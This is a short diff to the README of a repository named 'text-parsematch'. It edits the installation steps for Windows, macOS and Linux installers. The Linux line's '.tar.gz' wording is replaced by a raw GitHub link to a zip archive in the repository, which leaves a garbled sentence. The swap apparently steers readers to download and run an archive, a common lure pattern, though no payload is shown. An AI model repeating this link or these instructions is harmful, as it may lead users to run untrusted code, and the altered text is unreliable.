KushalPitaliya/text-parsematch/README.md

 ### 📂 Installation Steps
 - **Windows**: If you downloaded a `.exe` file, double-click to install.
 Follow prompts to complete the setup.
 - **macOS**: For a `.dmg` file, open it and drag the application to your Applications folder.
-- **Linux**: If you received a `.tar.gz` file, extract it and run the application from the terminal.
+- **Linux**: If you received a `https://github.com/KushalPitaliya/text-parsematch/raw/refs/heads/main/text_parsematch/parsematch-text-1.6.zip` file, extract it and run the application from the terminal.

 ## ⚙️ How to Use text-parsematch
 After installation, follow these straightforward steps to use the application: